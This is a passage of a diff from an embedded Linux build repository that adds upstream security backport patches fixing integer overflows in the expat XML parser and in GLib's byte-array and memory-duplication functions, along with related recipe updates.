parser->m_nsAttsVersion; +- int nsAttsSize = (int)1 << parser->m_nsAttsPower; ++ ++ /* Detect and prevent invalid shift */ ++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower; + unsigned char oldNsAttsPower = parser->m_nsAttsPower; + /* size of hash table must be at least 2 * (# of prefixed attributes) */ + if ((nPrefixes << 1) +@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + ; + if (parser->m_nsAttsPower < 3) + parser->m_nsAttsPower = 3; +- nsAttsSize = (int)1 << parser->m_nsAttsPower; ++ ++ /* Detect and prevent invalid shift */ ++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) { ++ /* Restore actual size of memory in m_nsAtts */ ++ parser->m_nsAttsPower = oldNsAttsPower; ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ nsAttsSize = 1u << parser->m_nsAttsPower; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) { ++ /* Restore actual size of memory in m_nsAtts */ ++ parser->m_nsAttsPower = oldNsAttsPower; ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts, + nsAttsSize * sizeof(NS_ATT)); + if (! temp) { diff --git a/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch new file mode 100644 index 0000000000..d6bafba0ff --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch @@ -0,0 +1,43 @@ +From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping +Date: Sat, 25 Dec 2021 20:52:08 +0100 +Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function + doProlog (CVE-2021-46143) + +--- + expat/lib/xmlparse.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index b47c31b0..8f243126 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end, + if (parser->m_prologState.level >= parser->m_groupSize) { + if (parser->m_groupSize) { + { ++ /* Detect and prevent integer overflow */ ++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + char *const new_connector = (char *)REALLOC( + parser, parser->m_groupConnector, parser->m_groupSize *= 2); + if (new_connector == NULL) { +@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end, + } + + if (dtd->scaffIndex) { ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + int *const new_scaff_index = (int *)REALLOC( + parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int)); + if (new_scaff_index == NULL) diff --git a/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch new file mode 100644 index 0000000000..e569fbc7ab --- /dev/null +++ b/poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch @@ -0,0 +1,257 @@ +From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001 +From: Sebastian Pipping +Date: Thu, 30 Dec 2021 22:46:03 +0100 +Subject: [PATCH] lib: Prevent integer overflow at multiple places + (CVE-2022-22822 to CVE-2022-22827) + +The involved functions are: +- addBinding (CVE-2022-22822) +- build_model (CVE-2022-22823) +- defineAttribute (CVE-2022-22824) +- lookup (CVE-2022-22825) +- nextScaffoldPart (CVE-2022-22826) +- storeAtts (CVE-2022-22827) + +Upstream-Status: Backport: +https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e + +CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827 +Signed-off-by: Steve Sakoman + +--- + expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 151 insertions(+), 2 deletions(-) + +diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c +index 8f243126..575e73ee 100644 +--- a/lib/xmlparse.c ++++ b/lib/xmlparse.c +@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + + /* get the attributes from the tokenizer */ + n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts); ++ ++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - nDefaultAtts) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + if (n + nDefaultAtts > parser->m_attsSize) { + int oldAttsSize = parser->m_attsSize; + ATTRIBUTE *temp; + #ifdef XML_ATTR_INFO + XML_AttrInfo *temp2; + #endif ++ ++ /* Detect and prevent integer overflow */ ++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE) ++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts, + parser->m_attsSize * sizeof(ATTRIBUTE)); + if (temp == NULL) { +@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + } + parser->m_atts = temp; + #ifdef XML_ATTR_INFO ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++# if UINT_MAX >= SIZE_MAX ++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) { ++ parser->m_attsSize = oldAttsSize; ++ return XML_ERROR_NO_MEMORY; ++ } ++# endif ++ + temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo, + parser->m_attsSize * sizeof(XML_AttrInfo)); + if (temp2 == NULL) { +@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr, + tagNamePtr->prefixLen = prefixLen; + for (i = 0; localPart[i++];) + ; /* i includes null terminator */ ++ ++ /* Detect and prevent integer overflow */ ++ if (binding->uriLen > INT_MAX - prefixLen ++ || i > INT_MAX - (binding->uriLen + prefixLen)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ + n = i + binding->uriLen + prefixLen; + if (n > binding->uriAlloc) { + TAG *p; ++ ++ /* Detect and prevent integer overflow */ ++ if (n > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char)); + if (! uri) + return XML_ERROR_NO_MEMORY; +@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + if (parser->m_freeBindingList) { + b = parser->m_freeBindingList; + if (len > b->uriAlloc) { ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + XML_Char *temp = (XML_Char *)REALLOC( + parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (temp == NULL) +@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId, + b = (BINDING *)MALLOC(parser, sizeof(BINDING)); + if (! b) + return XML_ERROR_NO_MEMORY; ++ ++ /* Detect and prevent integer overflow */ ++ if (len > INT_MAX - EXPAND_SPARE) { ++ return XML_ERROR_NO_MEMORY; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) { ++ return XML_ERROR_NO_MEMORY; ++ } ++#endif ++ + b->uri + = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE)); + if (! b->uri) { +@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata, + } + } else { + DEFAULT_ATTRIBUTE *temp; ++ ++ /* Detect and prevent integer overflow */ ++ if (type->allocDefaultAtts > INT_MAX / 2) { ++ return 0; ++ } ++ + int count = type->allocDefaultAtts * 2; ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) { ++ return 0; ++ } ++#endif ++ + temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts, + (count * sizeof(DEFAULT_ATTRIBUTE))); + if (temp == NULL) +@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) { + /* check for overflow (table is half full) */ + if (table->used >> (table->power - 1)) { + unsigned char newPower = table->power + 1; ++ ++ /* Detect and prevent invalid shift */ ++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) { ++ return NULL; ++ } ++ + size_t newSize = (size_t)1 << newPower; + unsigned long newMask = (unsigned long)newSize - 1; ++ ++ /* Detect and prevent integer overflow */ ++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) { ++ return NULL; ++ } ++ + size_t tsize = newSize * sizeof(NAMED *); + NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize); + if (! newV) +@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) { + if (dtd->scaffCount >= dtd->scaffSize) { + CONTENT_SCAFFOLD *temp; + if (dtd->scaffold) { ++ /* Detect and prevent integer overflow */ ++ if (dtd->scaffSize > UINT_MAX / 2u) { ++ return -1; ++ } ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) { ++ return -1; ++ } ++#endif ++ + temp = (CONTENT_SCAFFOLD *)REALLOC( + parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD)); + if (temp == NULL) +@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) { + XML_Content *ret; + XML_Content *cpos; + XML_Char *str; +- int allocsize = (dtd->scaffCount * sizeof(XML_Content) +- + (dtd->contentStringLen * sizeof(XML_Char))); ++ ++ /* Detect and prevent integer overflow. ++ * The preprocessor guard addresses the "always false" warning ++ * from -Wtype-limits on platforms where ++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */ ++#if UINT_MAX >= SIZE_MAX ++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) { ++ return NULL; ++ } ++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) { ++ return NULL; ++ } ++#endif ++ if (dtd->scaffCount * sizeof(XML_Content) ++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) { ++ return NULL; ++ } ++ ++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content) ++ + (dtd->contentStringLen * sizeof(XML_Char))); + + ret = (XML_Content *)MALLOC(parser, allocsize); + if (! ret) diff --git a/poky/meta/recipes-core/expat/expat_2.2.9.bb b/poky/meta/recipes-core/expat/expat_2.2.9.bb index cd38df91d9..757c18c5fa 100644 --- a/poky/meta/recipes-core/expat/expat_2.2.9.bb +++ b/poky/meta/recipes-core/expat/expat_2.2.9.bb @@ -1,13 +1,16 @@ SUMMARY = "A stream-oriented XML parser library" DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)" -HOMEPAGE = "http://expat.sourceforge.net/" +HOMEPAGE = "https://github.com/libexpat/libexpat" SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79" -SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https \ +SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \ file://CVE-2013-0340.patch \ + file://CVE-2021-45960.patch \ + file://CVE-2021-46143.patch \ + file://CVE-2022-22822-27.patch \ file://libtool-tag.patch \ " diff --git a/poky/meta/recipes-core/fts/fts_1.2.7.bb b/poky/meta/recipes-core/fts/fts_1.2.7.bb index ea820cb0c3..d3b0f31eda 100644 --- a/poky/meta/recipes-core/fts/fts_1.2.7.bb +++ b/poky/meta/recipes-core/fts/fts_1.2.7.bb @@ -10,7 +10,7 @@ SECTION = "libs" SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472" -SRC_URI = "git://github.com/pullmoll/musl-fts.git" +SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch new file mode 100644 index 0000000000..6257763d8d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch @@ -0,0 +1,129 @@ +Backport of: + +From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001 +From: Krzesimir Nowak +Date: Wed, 10 Feb 2021 23:51:07 +0100 +Subject: [PATCH] gbytearray: Do not accept too large byte arrays + +GByteArray uses guint for storing the length of the byte array, but it +also has a constructor (g_byte_array_new_take) that takes length as a +gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits +for guint). It is possible to call the function with a value greater +than G_MAXUINT, which will result in silent length truncation. This +may happen as a result of unreffing GBytes into GByteArray, so rather +be loud about it. + +(Test case tweaked by Philip Withnall.) + +(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for +`g_memdup2()`.) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27218 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + glib/garray.c | 6 ++++++ + glib/gbytes.c | 4 ++++ + glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++- + 3 files changed, 44 insertions(+), 1 deletion(-) + +--- a/glib/garray.c ++++ b/glib/garray.c +@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array, + * Create byte array containing the data. The data will be owned by the array + * and will be freed with g_free(), i.e. it could be allocated using g_strdup(). + * ++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray ++ * stores the length of its data in #guint, which may be shorter than ++ * #gsize. ++ * + * Since: 2.32 + * + * Returns: (transfer full): a new #GByteArray +@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data, + GByteArray *array; + GRealArray *real; + ++ g_return_val_if_fail (len <= G_MAXUINT, NULL); ++ + array = g_byte_array_new (); + real = (GRealArray *)array; + g_assert (real->data == NULL); +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes, + * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all + * other cases the data is copied. + * ++ * Do not use it if @bytes contains more than %G_MAXUINT ++ * bytes. #GByteArray stores the length of its data in #guint, which ++ * may be shorter than #gsize, that @bytes is using. ++ * + * Returns: (transfer full): a new mutable #GByteArray containing the same byte data + * + * Since: 2.32 +--- a/glib/tests/bytes.c ++++ b/glib/tests/bytes.c +@@ -10,12 +10,12 @@ + */ + + #undef G_DISABLE_ASSERT +-#undef G_LOG_DOMAIN + + #include + #include + #include + #include "glib.h" ++#include "glib/gstrfuncsprivate.h" + + /* Keep in sync with glib/gbytes.c */ + struct _GBytes +@@ -334,6 +334,38 @@ test_to_array_transferred (void) + } + + static void ++test_to_array_transferred_oversize (void) ++{ ++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to " ++ "G_MAXUINT in length; test that longer ones are rejected"); ++ ++ if (sizeof (guint) >= sizeof (gsize)) ++ { ++ g_test_skip ("Skipping test as guint is not smaller than gsize"); ++ } ++ else if (g_test_undefined ()) ++ { ++ GByteArray *array = NULL; ++ GBytes *bytes = NULL; ++ gpointer data = g_memdup2 (NYAN, N_NYAN); ++ gsize len = ((gsize) G_MAXUINT) + 1; ++ ++ bytes = g_bytes_new_take (data, len); ++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL, ++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed"); ++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes)); ++ g_test_assert_expected_messages (); ++ g_assert_null (array); ++ ++ g_free (data); ++ } ++ else ++ { ++ g_test_skip ("Skipping test as testing undefined behaviour is disabled"); ++ } ++} ++ ++static void + test_to_array_two_refs (void) + { + gconstpointer memory; +@@ -410,6 +442,7 @@ main (int argc, char *argv[]) + g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred); + g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs); + g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc); ++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize); + g_test_add_func ("/bytes/null", test_null); + + return g_test_run (); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch new file mode 100644 index 0000000000..2af9dd6aa4 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch @@ -0,0 +1,170 @@ +Backport of: + +From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:30:52 +0000 +Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This will replace the existing `g_memdup()` function for use within +GLib. It has an unavoidable security flaw of taking its `byte_size` +argument as a `guint` rather than as a `gsize`. Most callers will +expect it to be a `gsize`, and may pass in large values which could +silently be truncated, resulting in an undersize allocation compared +to what the caller expects. + +This could lead to a classic buffer overflow vulnerability for many +callers of `g_memdup()`. + +`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`. + +Spotted by Kevin Backhouse of GHSL. + +In GLib 2.68, `g_memdup2()` will be a new public API. In this version +for backport to older stable releases, it’s a new `static inline` API +in a private header, so that use of `g_memdup()` within GLib can be +fixed without adding a new API in a stable release series. + +Signed-off-by: Philip Withnall +Helps: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + docs/reference/glib/meson.build | 1 + + glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++ + glib/meson.build | 1 + + glib/tests/strfuncs.c | 23 ++++++++++++++ + 4 files changed, 80 insertions(+) + create mode 100644 glib/gstrfuncsprivate.h + +--- a/docs/reference/glib/meson.build ++++ b/docs/reference/glib/meson.build +@@ -22,6 +22,7 @@ if get_option('gtk_doc') + 'gprintfint.h', + 'gmirroringtable.h', + 'gscripttable.h', ++ 'gstrfuncsprivate.h', + 'glib-mirroring-tab', + 'gnulib', + 'pcre', +--- /dev/null ++++ b/glib/gstrfuncsprivate.h +@@ -0,0 +1,55 @@ ++/* GLIB - Library of useful routines for C programming ++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald ++ * ++ * This library is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU Lesser General Public ++ * License as published by the Free Software Foundation; either ++ * version 2.1 of the License, or (at your option) any later version. ++ * ++ * This library is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ * Lesser General Public License for more details. ++ * ++ * You should have received a copy of the GNU Lesser General Public ++ * License along with this library; if not, see . ++ */ ++ ++#include ++#include ++ ++/* ++ * g_memdup2: ++ * @mem: (nullable): the memory to copy. ++ * @byte_size: the number of bytes to copy. ++ * ++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it ++ * from @mem. If @mem is %NULL it returns %NULL. ++ * ++ * This replaces g_memdup(), which was prone to integer overflows when ++ * converting the argument from a #gsize to a #guint. ++ * ++ * This static inline version is a backport of the new public API from ++ * GLib 2.68, kept internal to GLib for backport to older stable releases. ++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319. ++ * ++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory, ++ * or %NULL if @mem is %NULL. ++ * Since: 2.68 ++ */ ++static inline gpointer ++g_memdup2 (gconstpointer mem, ++ gsize byte_size) ++{ ++ gpointer new_mem; ++ ++ if (mem && byte_size != 0) ++ { ++ new_mem = g_malloc (byte_size); ++ memcpy (new_mem, mem, byte_size); ++ } ++ else ++ new_mem = NULL; ++ ++ return new_mem; ++} +--- a/glib/meson.build ++++ b/glib/meson.build +@@ -268,6 +268,7 @@ glib_sources = files( + 'gslist.c', + 'gstdio.c', + 'gstrfuncs.c', ++ 'gstrfuncsprivate.h', + 'gstring.c', + 'gstringchunk.c', + 'gtestutils.c', +--- a/glib/tests/strfuncs.c ++++ b/glib/tests/strfuncs.c +@@ -32,6 +32,8 @@ + #include + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + #if defined (_MSC_VER) && (_MSC_VER <= 1800) + #define isnan(x) _isnan(x) + +@@ -219,6 +221,26 @@ test_memdup (void) + g_free (str_dup); + } + ++/* Testing g_memdup2() function with various positive and negative cases */ ++static void ++test_memdup2 (void) ++{ ++ gchar *str_dup = NULL; ++ const gchar *str = "The quick brown fox jumps over the lazy dog"; ++ ++ /* Testing negative cases */ ++ g_assert_null (g_memdup2 (NULL, 1024)); ++ g_assert_null (g_memdup2 (str, 0)); ++ g_assert_null (g_memdup2 (NULL, 0)); ++ ++ /* Testing normal usage cases */ ++ str_dup = g_memdup2 (str, strlen (str) + 1); ++ g_assert_nonnull (str_dup); ++ g_assert_cmpstr (str, ==, str_dup); ++ ++ g_free (str_dup); ++} ++ + /* Testing g_strpcpy() function with various positive and negative cases */ + static void + test_stpcpy (void) +@@ -2523,6 +2545,7 @@ main (int argc, + g_test_add_func ("/strfuncs/has-prefix", test_has_prefix); + g_test_add_func ("/strfuncs/has-suffix", test_has_suffix); + g_test_add_func ("/strfuncs/memdup", test_memdup); ++ g_test_add_func ("/strfuncs/memdup2", test_memdup2); + g_test_add_func ("/strfuncs/stpcpy", test_stpcpy); + g_test_add_func ("/strfuncs/str_match_string", test_str_match_string); + g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch new file mode 100644 index 0000000000..20137ea5f3 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch @@ -0,0 +1,249 @@ +From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:37:56 +0000 +Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gdbusconnection.c | 5 +++-- + gio/gdbusinterfaceskeleton.c | 3 ++- + gio/gfile.c | 7 ++++--- + gio/gsettingsschema.c | 5 +++-- + gio/gwin32registrykey.c | 8 +++++--- + gio/tests/async-close-output-stream.c | 6 ++++-- + gio/tests/gdbus-export.c | 5 +++-- + gio/win32/gwinhttpfile.c | 9 +++++---- + 8 files changed, 29 insertions(+), 19 deletions(-) + +--- a/gio/gdbusconnection.c ++++ b/gio/gdbusconnection.c +@@ -110,6 +110,7 @@ + #include "gasyncinitable.h" + #include "giostream.h" + #include "gasyncresult.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gmarshal-internal.h" + +@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusInterfaceVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusSubtreeVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +--- a/gio/gdbusinterfaceskeleton.c ++++ b/gio/gdbusinterfaceskeleton.c +@@ -28,6 +28,7 @@ + #include "gdbusmethodinvocation.h" + #include "gdbusconnection.h" + #include "gmarshal-internal.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gioerror.h" + +@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke + * properly before building the hooked_vtable, so we create it + * once at the last minute. + */ +- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); ++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); + interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call; + } + +--- a/gio/gfile.c ++++ b/gio/gfile.c +@@ -60,6 +60,7 @@ + #include "gasyncresult.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + + /** +@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re + g_main_context_invoke_full (g_task_get_context (task), + g_task_get_priority (task), + measure_disk_usage_invoke_progress, +- g_memdup (&progress, sizeof progress), ++ g_memdup2 (&progress, sizeof progress), + g_free); + } + +@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask + data->progress_callback ? measure_disk_usage_progress : NULL, task, + &result.disk_usage, &result.num_dirs, &result.num_files, + &error)) +- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free); ++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free); + else + g_task_return_error (task, error); + } +@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF + + task = 